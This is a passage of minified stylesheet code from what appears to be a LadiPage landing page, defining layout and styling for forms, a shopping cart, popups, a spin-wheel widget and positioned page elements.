.ladi-form-item.ladi-form-checkbox .ladi-form-checkbox-item span{display:table-cell;cursor:default;vertical-align:middle;word-break:break-word}.ladi-form .ladi-form-item.ladi-form-checkbox.ladi-form-checkbox-horizontal .ladi-form-checkbox-item input{position:absolute;top:4px}.ladi-form .ladi-form-item.ladi-form-checkbox.ladi-form-checkbox-horizontal .ladi-form-checkbox-item span{padding-left:18px}.ladi-form .ladi-form-item textarea.ladi-form-control{resize:none;padding:5px}.ladi-form .ladi-button{cursor:pointer}.ladi-form .ladi-button .ladi-headline{cursor:pointer;user-select:none}.ladi-combobox{position:absolute;width:100%;height:100%}.ladi-combobox .ladi-combobox-item-container{position:absolute;width:100%;height:100%;text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-combobox .ladi-combobox-item-container .ladi-combobox-item-background{position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-combobox .ladi-combobox-item-container .ladi-combobox-item{width:100%;height:100%;position:absolute;text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit}.ladi-combobox .ladi-combobox-item-container .ladi-combobox-item .ladi-combobox-control option{color:initial}.ladi-combobox .ladi-combobox-item-container .ladi-combobox-item .ladi-combobox-control{background-color:transparent;min-width:100%;min-height:100%;max-width:100%;max-height:100%;width:100%;height:100%;padding:0 5px;font-size:inherit;border:none;text-transform:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit;-webkit-appearance:none;-moz-appearance:none;appearance:none;background-size:9px 6px!important;background-position:right .5rem center;background-repeat:no-repeat}.ladi-combobox .ladi-combobox-item-container .ladi-combobox-item .ladi-combobox-control:not([data-selected=""]){text-decoration:inherit}.ladi-cart{position:absolute;width:100%;font-size:12px}.ladi-cart .ladi-cart-row{position:relative;display:inline-table;width:100%}.ladi-cart .ladi-cart-row:after{content:'';position:absolute;left:0;bottom:0;height:1px;width:100%;background:#dcdcdc}.ladi-cart .ladi-cart-no-product{text-align:center;font-size:16px;vertical-align:middle}.ladi-cart .ladi-cart-image{width:16%;vertical-align:middle;position:relative;text-align:center}.ladi-cart .ladi-cart-image img{max-width:100%}.ladi-cart .ladi-cart-title{vertical-align:middle;padding:0 5px;word-break:break-all}.ladi-cart .ladi-cart-title .ladi-cart-title-name{display:block;margin-bottom:5px;word-break:break-word}.ladi-cart .ladi-cart-title .ladi-cart-title-variant{font-weight:700;display:block;word-break:break-word}.ladi-cart .ladi-cart-image .ladi-cart-image-quantity{position:absolute;top:-3px;right:-5px;background:rgba(150,149,149,.9);width:20px;height:20px;border-radius:50%;text-align:center;color:#fff;line-height:20px}.ladi-cart .ladi-cart-quantity{width:70px;vertical-align:middle;text-align:center}.ladi-cart .ladi-cart-quantity-content{display:-webkit-inline-flex;display:inline-flex}.ladi-cart .ladi-cart-quantity input{width:24px;text-align:center;height:22px;-moz-appearance:textfield;border-top:1px solid #dcdcdc;border-bottom:1px solid #dcdcdc}.ladi-cart .ladi-cart-quantity input::-webkit-inner-spin-button,.ladi-cart .ladi-cart-quantity input::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}.ladi-cart .ladi-cart-quantity button{border:1px solid #dcdcdc;cursor:pointer;text-align:center;width:21px;height:22px;position:relative;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-cart .ladi-cart-quantity button:active{transform:translateY(2px);transition:transform .2s linear}.ladi-cart .ladi-cart-quantity button span{font-size:18px;position:relative;left:.5px}.ladi-cart .ladi-cart-quantity button:first-child span{top:-1.2px}.ladi-cart .ladi-cart-price{width:100px;vertical-align:middle;text-align:right;padding:0 10px 0 5px}.ladi-cart .ladi-cart-row.has-promotion .ladi-cart-price span{text-decoration:line-through;display:block;margin-bottom:3px}.ladi-cart .ladi-cart-row.has-promotion .ladi-cart-price span.price-compare{text-decoration:none;color:#e85d04;font-weight:700;margin-bottom:0}.ladi-cart .ladi-cart-row.has-promotion .ladi-cart-title span.promotion-name{margin-top:5px;display:block;word-break:break-word}.ladi-cart .ladi-cart-action{width:28px;vertical-align:middle;text-align:center}.ladi-cart .ladi-cart-action button{border:1px solid #dcdcdc;cursor:pointer;text-align:center;width:25px;height:22px;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-cart .ladi-cart-action button:active{transform:translateY(2px);transition:transform .2s linear}.ladi-cart .ladi-cart-action button span{font-size:13px;position:relative;top:.5px}.ladi-video{position:absolute;width:100%;height:100%;cursor:pointer;overflow:hidden}.ladi-video .ladi-video-background{position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none}.ladi-group{position:absolute;width:100%;height:100%}.ladi-button-group{position:absolute;width:100%;height:100%}.ladi-button-group>.ladi-element{transition:inherit}.ladi-button-group>.ladi-element>.ladi-button{transition:inherit}.ladi-shape{position:absolute;width:100%;height:100%;pointer-events:none}.ladi-html-code{position:absolute;width:100%;height:100%}.ladi-image{position:absolute;width:100%;height:100%;overflow:hidden;pointer-events:none}.ladi-image .ladi-image-background{background-repeat:no-repeat;background-position:left top;background-size:cover;background-attachment:scroll;background-origin:content-box;position:absolute;margin:0 auto;width:100%;height:100%;pointer-events:none}.ladi-headline{width:100%;display:inline-block;background-size:cover;background-position:center center}.ladi-headline a{text-decoration:underline}.ladi-paragraph{width:100%;display:inline-block}.ladi-paragraph a{text-decoration:underline}.ladi-list-paragraph{width:100%;display:inline-block}.ladi-list-paragraph a{text-decoration:underline}.ladi-list-paragraph ul li{position:relative;counter-increment:linum}.ladi-list-paragraph ul li:before{position:absolute;background-repeat:no-repeat;background-size:100% 100%;left:0}.ladi-list-paragraph ul li:last-child{padding-bottom:0!important}.ladi-line{position:relative}.ladi-line .ladi-line-container{border-bottom:0!important;border-right:0!important;width:100%;height:100%}a[data-action]{user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;cursor:pointer}a:visited{color:inherit}a:link{color:inherit}.button-unmute{cursor:pointer;position:absolute;width:100%;height:100%;top:0;left:0;right:0;bottom:0;margin:auto}.button-unmute div{background-image:url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2036%2036%22%20width%3D%22100%25%22%20height%3D%22100%25%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22m%2021.48%2C17.98%20c%200%2C-1.77%20-1.02%2C-3.29%20-2.5%2C-4.03%20v%202.21%20l%202.45%2C2.45%20c%20.03%2C-0.2%20.05%2C-0.41%20.05%2C-0.63%20z%20m%202.5%2C0%20c%200%2C.94%20-0.2%2C1.82%20-0.54%2C2.64%20l%201.51%2C1.51%20c%20.66%2C-1.24%201.03%2C-2.65%201.03%2C-4.15%200%2C-4.28%20-2.99%2C-7.86%20-7%2C-8.76%20v%202.05%20c%202.89%2C.86%205%2C3.54%205%2C6.71%20z%20M%209.25%2C8.98%20l%20-1.27%2C1.26%204.72%2C4.73%20H%207.98%20v%206%20H%2011.98%20l%205%2C5%20v%20-6.73%20l%204.25%2C4.25%20c%20-0.67%2C.52%20-1.42%2C.93%20-2.25%2C1.18%20v%202.06%20c%201.38%2C-0.31%202.63%2C-0.95%203.69%2C-1.81%20l%202.04%2C2.05%201.27%2C-1.27%20-9%2C-9%20-7.72%2C-7.72%20z%20m%207.72%2C.99%20-2.09%2C2.08%202.09%2C2.09%20V%209.98%20z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");width:60px;height:60px;position:absolute;top:0;left:0;bottom:0;right:0;margin:auto;background-color:rgba(0,0,0,.5);border-radius:100%;background-size:90%;background-repeat:no-repeat;background-position:center center}[data-opacity="0"]{opacity:0}[data-hidden=true]{display:none}[data-action=true]{cursor:pointer}.ladi-hidden{display:none}.backdrop-popup{display:none;position:fixed;top:0;left:0;right:0;bottom:0;z-index:90000060}.lightbox-screen{display:none;position:fixed;width:100%;height:100%;top:0;left:0;bottom:0;right:0;margin:auto;z-index:9000000080;background:rgba(0,0,0,.5)}.lightbox-screen .lightbox-close{position:absolute;z-index:9000000090;cursor:pointer}.lightbox-screen .lightbox-hidden{display:none}.ladi-animation-hidden{visibility:hidden!important}.ladi-lazyload{background-image:none!important}.ladi-list-paragraph ul li.ladi-lazyload:before{background-image:none!important}.ladi-cart-number{position:absolute;top:-2px;right:-7px;background:#f36e36;text-align:center;width:18px;height:18px;line-height:18px;font-size:11px;font-weight:700;color:#fff;border-radius:100%}.ladi-form-quantity{display:-webkit-inline-flex;display:inline-flex;border-color:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item.ladi-form-quantity .ladi-form-control{text-align:center;pointer-events:none;-moz-appearance:textfield;width:calc(100% - 45px);padding:0;min-width:24px;border-top:1px hidden;border-bottom:1px hidden;border-color:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item.ladi-form-quantity input::-webkit-inner-spin-button,.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item.ladi-form-quantity input::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}.ladi-form-quantity button{border:1px hidden;border-color:inherit;cursor:pointer;text-align:center;width:30px;height:100%;position:relative;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-form-quantity button span{font-size:18px;position:relative;left:.5px}.ladi-form-quantity button:first-child span{top:-1.2px}.ladi-form [data-variant=true] select option[disabled]{background:#fff;color:#b8b8b8!important}.ladi-story-page-progress-bar{width:100%;height:25px;position:fixed;top:0;left:0}.ladi-story-page-progress-bar-item{height:100%;width:100%;display:block;float:left;margin:0 5px;position:relative;cursor:pointer}.ladi-story-page-progress-bar-item:before{content:'';position:absolute;background:rgba(255,255,255,.4);border-radius:10px;width:100%;height:4px;margin:auto;top:0;bottom:0;left:0;right:0}.ladi-story-page-progress-bar-item.active:before{background:#fff}.ladi-story-page-progress-bar-item span{background:#fff;border-radius:10px;height:4px;display:block;margin:auto 0;top:0;bottom:0;position:absolute;transition:width .3s linear;width:0%}.ladi-carousel .ladi-carousel-arrow,.ladi-collection .ladi-collection-arrow,.ladi-collection .ladi-collection-button-next,.ladi-gallery .ladi-gallery-control .ladi-gallery-control-arrow,.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow,.ladi-section .ladi-section-arrow-down{width:33px;height:33px;background-repeat:no-repeat;background-position:center center;background-image:url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E")}#SECTION_POPUP .popup-close,.ladi-section .ladi-section-close,.lightbox-screen .lightbox-close{width:18px;height:18px;margin:6px;background-repeat:no-repeat;background-position:center center;background-image:url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20148.1%20148.1%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M83.4%2C74l54.1-54.1c2.6-2.6%2C2.6-6.8%2C0-9.3c-2.6-2.6-6.8-2.6-9.3%2C0L74%2C64.7L20%2C10.5c-2.6-2.6-6.8-2.6-9.3%2C0c-2.6%2C2.6-2.6%2C6.8%2C0%2C9.3l54%2C54.1l-54.1%2C54.1c-2.6%2C2.6-2.6%2C6.8%2C0%2C9.3c2.6%2C2.6%2C6.8%2C2.6%2C9.3%2C0l54.1-54l54.1%2C54.1c1.3%2C1.3%2C3%2C1.9%2C4.7%2C1.9s3.4-0.6%2C4.7-1.9c1.3-1.3%2C2-3.1%2C2-4.9c0-1.7-0.8-3.4-2-4.6L83.4%2C74z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E")}#BODY_BACKGROUND{position:fixed;pointer-events:none;top:0;left:0;right:0;margin:0 auto;height:100vh!important}#POPUP_BLOG .ladi-headline img,#POPUP_BLOG .ladi-paragraph img{max-width:100%}.ladi-element.ladi-auto-scroll{overflow-x:scroll;overflow-y:hidden;width:100%!important;left:0!important;-webkit-overflow-scrolling:touch}.ladi-section.ladi-auto-scroll{overflow-x:scroll;overflow-y:hidden;-webkit-overflow-scrolling:touch}.ladi-carousel .ladi-carousel-content{transition:left .3s ease-in-out}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item{transition:transform .3s ease-in-out}#POPUP_BLOG .ladi-headline img,#POPUP_BLOG .ladi-paragraph img{height:auto!important}.ladi-notify-transition{transition:top .5s ease-in-out,bottom .5s ease-in-out,opacity .5s ease-in-out}.ladi-notify{padding:5px;box-shadow:0 0 1px rgba(64,64,64,.3),0 8px 50px rgba(64,64,64,.05);border-radius:40px;color:rgba(64,64,64,1);background:rgba(250,250,250,.9);line-height:1.6;width:100%;height:100%;font-size:13px}.ladi-notify .ladi-notify-image img{float:left;margin-right:13px;border-radius:50%;width:53px;height:53px;pointer-events:none}.ladi-notify .ladi-notify-title{font-size:100%;height:17px;overflow:hidden;font-weight:700;overflow-wrap:break-word;text-overflow:ellipsis;white-space:nowrap;line-height:1}.ladi-notify .ladi-notify-content{font-size:92.308%;height:17px;overflow:hidden;overflow-wrap:break-word;text-overflow:ellipsis;white-space:nowrap;line-height:1;padding-top:2px}.ladi-notify .ladi-notify-time{line-height:1.6;font-size:84.615%;display:inline-block;overflow-wrap:break-word;text-overflow:ellipsis;white-space:nowrap;max-width:calc(100% - 155px);overflow:hidden}.ladi-notify .ladi-notify-copyright{font-size:76.9231%;margin-left:2px;position:relative;padding:0 5px;cursor:pointer;opacity:.6;display:inline-block;top:-4px}.ladi-notify .ladi-notify-copyright svg{vertical-align:middle}.ladi-notify .ladi-notify-copyright svg:not(:root){overflow:hidden}.ladi-notify .ladi-notify-copyright div{text-decoration:none;color:rgba(64,64,64,1);display:inline}.ladi-notify .ladi-notify-copyright strong{font-weight:700}.builder-container .ladi-notify{transition:unset}.ladi-spin-lucky{width:100%;height:100%;border-radius:100%;box-shadow:0 0 7px 0 rgba(64,64,64,.6),0 8px 50px rgba(64,64,64,.3);background-repeat:no-repeat;background-size:cover}.ladi-spin-lucky .ladi-spin-lucky-start{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:20%;height:20%;cursor:pointer;background-size:contain;background-position:center center;background-repeat:no-repeat;transition:transform .3s ease-in-out;-webkit-transition:transform .3s ease-in-out}.ladi-spin-lucky .ladi-spin-lucky-start:hover{transform:scale(1.1)}.ladi-spin-lucky .ladi-spin-lucky-screen{width:100%;height:100%;border-radius:100%;transition:transform 7s cubic-bezier(.25,.1,0,1);-webkit-transition:transform 7s cubic-bezier(.25,.1,0,1);text-decoration-line:inherit;-webkit-text-decoration-line:inherit;text-transform:inherit}.ladi-spin-lucky .ladi-spin-lucky-screen:before{background-size:cover;background-position:center center;background-repeat:no-repeat;content:'';position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none}.ladi-spin-lucky .ladi-spin-lucky-label{position:absolute;top:50%;left:50%;overflow:hidden;width:42%;padding-left:12%;transform-origin:0 0;-webkit-transform-origin:0 0;text-decoration-line:inherit;-webkit-text-decoration-line:inherit;text-transform:inherit;line-height:1.6;text-shadow:rgba(0,0,0,.5) 1px 0 2px}</style><style id="style_page" type="text/css">.ladi-wraper {margin: 0 auto; width: 420px;}body {font-family: Montserrat, sans-serif}</style><style id="style_element" type="text/css">#SECTION_POPUP { height: 0px;}#SECTION_POPUP .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#SECTION26 { height: 532.639px;}#SECTION26 .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#SECTION30 { height: 370.71px;}#SECTION30 .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#SECTION82 { height: 75.004px;}#SECTION82 > .ladi-section-background { background-color: rgb(36, 36, 36);}#SECTION82 .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#SECTION1 { height: 235.925px;}#SECTION1 .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#IMAGE303 { width: 35px;height: 35px;top: 0px;left: 0px;}#IMAGE303 > .ladi-image > .ladi-image-background { width: 35px;height: 35px;top: 0px;left: 0px;background-image: url("https://w.ladicdn.com/s350x350/5c7362c6c417ab07e5196b05/how-to-use-tiktok-main_thumb1200_16-9-20210630021519.png");}#IMAGE303 > .ladi-image { border-radius: 99px;}#IMAGE304 { width: 35px;height: 35px;top: 0px;left: 56.7777px;}#IMAGE304 > .ladi-image > .ladi-image-background { width: 35px;height: 35px;top: 0px;left: 0px;background-image: url("https://w.ladicdn.com/s350x350/5c7362c6c417ab07e5196b05/facebook_icon_130940-20210630021519.png");}#IMAGE304 > .ladi-image { border-radius: 99px;}#IMAGE305 { width: 35px;height: 35px;top: 0px;left: 113.555px;}#IMAGE305 > .ladi-image > .ladi-image-background { width: 35px;height: 35px;top: 0px;left: 0px;background-image: url("https://w.ladicdn.com/s350x350/5c7362c6c417ab07e5196b05/2048px-instagram_icon-20210630021519.png");}#IMAGE305 > .ladi-image { border-radius: 99px;}#IMAGE306 { width: 35px;height: 35px;top: 0px;left: 170.333px;}#IMAGE306 > .ladi-image > .ladi-image-background { width: 35px;height: 35px;top: 0px;left: 0px;background-image: url("https://w.ladicdn.com/s350x350/5c7362c6c417ab07e5196b05/1037144-20210630021519.png");}#IMAGE306 > .ladi-image { border-radius: 99px;}#GROUP307 { width: 205.333px;height: 35px;top: 19.504px;left: 12.1544px;}#BUTTON536 { width: 144px;height: 40px;top: 17.004px;left: 264px;}#BUTTON536 > .ladi-button { border-style: solid; border-color: rgb(190, 241, 250); border-width: 1px; border-radius: 0px;}#BUTTON_TEXT536 { width: 142px;top: 9px;left: 0px;}#BUTTON_TEXT536 > .ladi-headline { color: rgb(190, 241, 250); font-size: 14px; font-weight: bold; text-align: center; line-height: 1.6;}#BUTTON_TEXT536 > .ladi-headline:hover {color: rgb(255, 255, 255);}#POPUP808 { width: 391px;height: 519px;top: 0px;left: 0px;bottom: 0px;right: 0px;margin: auto; border-radius: 0px;}#POPUP808 > .ladi-popup > .ladi-popup-background { background-color: rgb(255, 255, 255);}#POPUP808 .popup-close {display: none;}#FORM809 { width: 371px;height: 169.627px;top: 86px;left: 12px;}#FORM809 > .ladi-form { color: rgb(132, 132, 132); font-size: 14px; line-height: 1.6;}#FORM809 .ladi-form-item .ladi-form-control::placeholder, #FORM809 .ladi-form .ladi-form-item.ladi-form-checkbox .ladi-form-checkbox-item span[data-checked="false"] {color: rgba(132, 132, 132, 1);}#FORM809 .ladi-form-item-container .ladi-form-item .ladi-form-control-select {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20version%3D%221.1%22%20width%3D%2232%22%20height%3D%2224%22%20viewBox%3D%220%200%2032%2024%22%3E%3Cpolygon%20points%3D%220%2C0%2032%2C0%2016%2C24%22%20style%3D%22fill%3A%20rgba(132%2C%20132%2C%20132%2C%201)%22%3E%3C%2Fpolygon%3E%3C%2Fsvg%3E");}#FORM809 .ladi-form-item-container, #FORM809 .ladi-form-label-container .ladi-form-label-item {border-style: solid; border-color: rgb(238, 238, 238); border-width: 1px;box-shadow: 0px 8px 8px -15px #000; -webkit-box-shadow: 0px 8px 8px -15px #000;}#FORM809 .ladi-form-item-container .ladi-form-quantity button {background-color: rgb(238, 238, 238);}#BUTTON810 { width: 371px;height: 40px;top: 129.627px;left: 0px;}#BUTTON810 > .ladi-button > .ladi-button-background { background: rgba(67, 117, 202, 1.0); background: -webkit-linear-gradient(120deg, rgba(67, 117, 202, 1.0), rgba(67, 117, 202, 1.0)); background: linear-gradient(120deg, rgba(67, 117, 202, 1.0), rgba(67, 117, 202, 1.0));}#BUTTON810 > .ladi-button { box-shadow: 0px 10px 10px -15px #000; -webkit-box-shadow: 0px 10px 10px -15px #000; border-radius: 0px;}#BUTTON_TEXT810 { width: 371px;top: 11.4463px;left: 0px;}#BUTTON_TEXT810 > .ladi-headline { color: rgb(255, 255, 255); font-size: 14px; font-weight: bold; text-align: center; line-height: 1.6;}#HEADLINE815 { width: 300px;top: 43px;left: 40px;}#HEADLINE815 > .ladi-headline { color: rgb(48, 131, 232); font-size: 24px; font-weight: bold; text-align: center; line-height: 1.6;}#BODY_BACKGROUND { height: 0px;}#BODY_BACKGROUND > .ladi-section-background { background-size: cover; background-attachment: scroll; background-origin: content-box; background-image: url("https://w.ladicdn.com/s768x0/5c7362c6c417ab07e5196b05/asset-3-20210917103518.png"); background-position: center top; background-repeat: repeat;}#BODY_BACKGROUND .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#IMAGE1344 { width: 91.0588px;height: 91.0588px;top: 0px;left: 0px;}#IMAGE1344 > .ladi-image > .ladi-image-background { width: 103.017px;height: 132.777px;top: -8.34706px;left: -8.9227px;background-image: url("https://i.imgur.com/XQ2jhRd.png");}#IMAGE1344 > .ladi-image { border-radius: 99px;}#BOX1347 { width: 24.567px;height: 24.567px;top: 0px;left: 0px;}#BOX1347 > .ladi-box { box-shadow: 0px 15px 20px -10px rgba(7, 105, 114, 0.2); -webkit-box-shadow: 0px 15px 20px -10px rgba(7, 105, 114, 0.2); background-color: rgb(0, 198, 255); border-style: solid; border-color: rgb(255, 255, 255); border-width: 3px; border-radius: 99px;}#SHAPE1348 { width: 14.7401px;height: 14.7401px;top: 4.9134px;left: 4.9134px;}#SHAPE1348 svg:last-child { fill: rgba(255, 255, 255, 1);}#GROUP1346 { width: 24.567px;height: 24.567px;top: 66.4918px;left: 66.4918px;}#GROUP1346.ladi-animation > .ladi-group { animation-name: bounceIn; -webkit-animation-name: bounceIn; animation-delay: 1s; -webkit-animation-delay: 1s; animation-duration: 1s; -webkit-animation-duration: 1s; animation-iteration-count: 1; -webkit-animation-iteration-count: 1;}#BOX1351 { width: 129px;height: 129px;top: 0px;left: 0px;}#BOX1351 > .ladi-box { background: rgba(250, 223, 190, 1.0); background: -webkit-linear-gradient(180deg, rgba(250, 223, 190, 1.0), rgba(190, 242, 250, 0.0)); background: linear-gradient(180deg, rgba(250, 223, 190, 1.0), rgba(190, 242, 250, 0.0));border-style: solid; border-color: rgb(210, 210, 210); border-width: 1px; border-radius: 99px;}#HEADLINE1353 { width: 252px;top: 59.246px;left: 158px;}#HEADLINE1353 > .ladi-headline { color: rgb(36, 36, 36); font-size: 22px; font-weight: bold; text-align: center; line-height: 1.4;}#HEADLINE1382 { width: 372px;top: 10.936px;left: 24px;}#HEADLINE1382 > .ladi-headline { color: rgb(36, 36, 36); font-size: 22px; font-weight: bold; text-align: center; line-height: 1.4;}#HEADLINE1382.ladi-animation > .ladi-headline { animation-name: pulse; -webkit-animation-name: pulse; animation-delay: 0s; -webkit-animation-delay: 0s; animation-duration: 1s; -webkit-animation-duration: 1s; animation-iteration-count: infinite; -webkit-animation-iteration-count: infinite;}#BOX1384 { width: 396.613px;height: 277.065px;top: 0px;left: 0px;}#BOX1384 > .ladi-box { background: #bef1fa; background: -webkit-radial-gradient(circle, #bef1fa, rgba(190, 242, 250, 0.0)); background: radial-gradient(circle, #bef1fa, rgba(190, 242, 250, 0.0));border-style: solid; border-color: rgb(210, 210, 210); border-width: 1px; border-radius: 0px;}#IMAGE1385 { width: 396.613px;height: 263.324px;top: 0px;left: 0px;}#IMAGE1385 > .ladi-image > .ladi-image-background { width: 430.613px;height: 263.324px;top: 0px;left: -34px;background-image: url("https://w.ladicdn.com/s750x600/61dfb41e89de930012864582/safe_image-20220113072135.jpg");}#IMAGE1385 > .ladi-image { border-radius: 0px;}#GROUP1383 { width: 396.613px;height: 277.065px;top: 93.645px;left: 12.833px;}#SECTION1425 { height: 15.71px;}#SECTION1425 .ladi-section-arrow-down {background-image: url("data:image/svg+xml;utf8, %3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2023%2039%22%20style%3D%22filter%3A%20drop-shadow(0%201px%20.15px%20%23B2B2B2)%3B%20transform%3A%20rotate(90deg)%3B%20-webkit-transform%3A%20rotate(90deg)%3B%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22M2%2C3l1.5-1.5l18.1%2C18l-18.1%2C18L2%2C36l16.6-16.5L2%2C3z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E");}#GROUP1465 { width: 91.0588px;height: 91.0588px;top: 18.9707px;left: 18.9706px;}#GROUP1466 { width: 129px;height: 129px;top: 6.246px;left: 24px;}#VIDEO1484 { width: 400px;height: 613.679px;top: -92.679px;left: 10px;}#VIDEO1484 > .ladi-video > .ladi-video-background { background-size: cover; background-attachment: scroll; background-origin: content-box; background-image: url("https://w.ladicdn.com/s400x613/61dfb41e89de930012864582/bg-new-3-20220113072409.jpg"); background-position: center center; background-repeat: no-repeat;}#SHAPE1484 { width: 60px;height: 60px;top: 276.839px;left: 170px;}#SHAPE1484 svg:last-child { fill: rgba(0, 0, 0, 0.5);}#PARAGRAPH1485 { width: 400px;top: 41.936px;left: 8px;}#PARAGRAPH1485 > .ladi-paragraph { color: rgb(199, 31, 22); font-size: 14px; text-align: center; line-height: 1.6;}#BOX1486 { width: 391px;height: 30px;top: 8px;left: 0px;}#BOX1486 > .ladi-box { background-color: rgb(202, 32, 24);}#HEADLINE1487 { width: 354px;top: 13.5px;left: 18.5px;}#HEADLINE1487 > .ladi-headline { color: rgb(255, 255, 255); font-size: 13px; text-align: center; line-height: 1.6;}#FORM_ITEM811 { width: 371px;height: 42px;top: 0px;left: 0px;}#FORM_ITEM1488 { width: 371px;height: 42px;top: 65.5806px;left: 0px;}#HEADLINE1489 { width: 199px;top: 278.5px;left: 99px;}#HEADLINE1489 > .ladi-headline { color: rgb(48, 131, 232); font-size: 12px; text-align: center; line-height: 1.6;}#LINE1490 { width: 161px;top: 308.5px;left: 12px;}#LINE1490 > .ladi-line > .ladi-line-container { border-top: 1px solid rgb(180, 180, 180); border-right: 1px solid rgb(180, 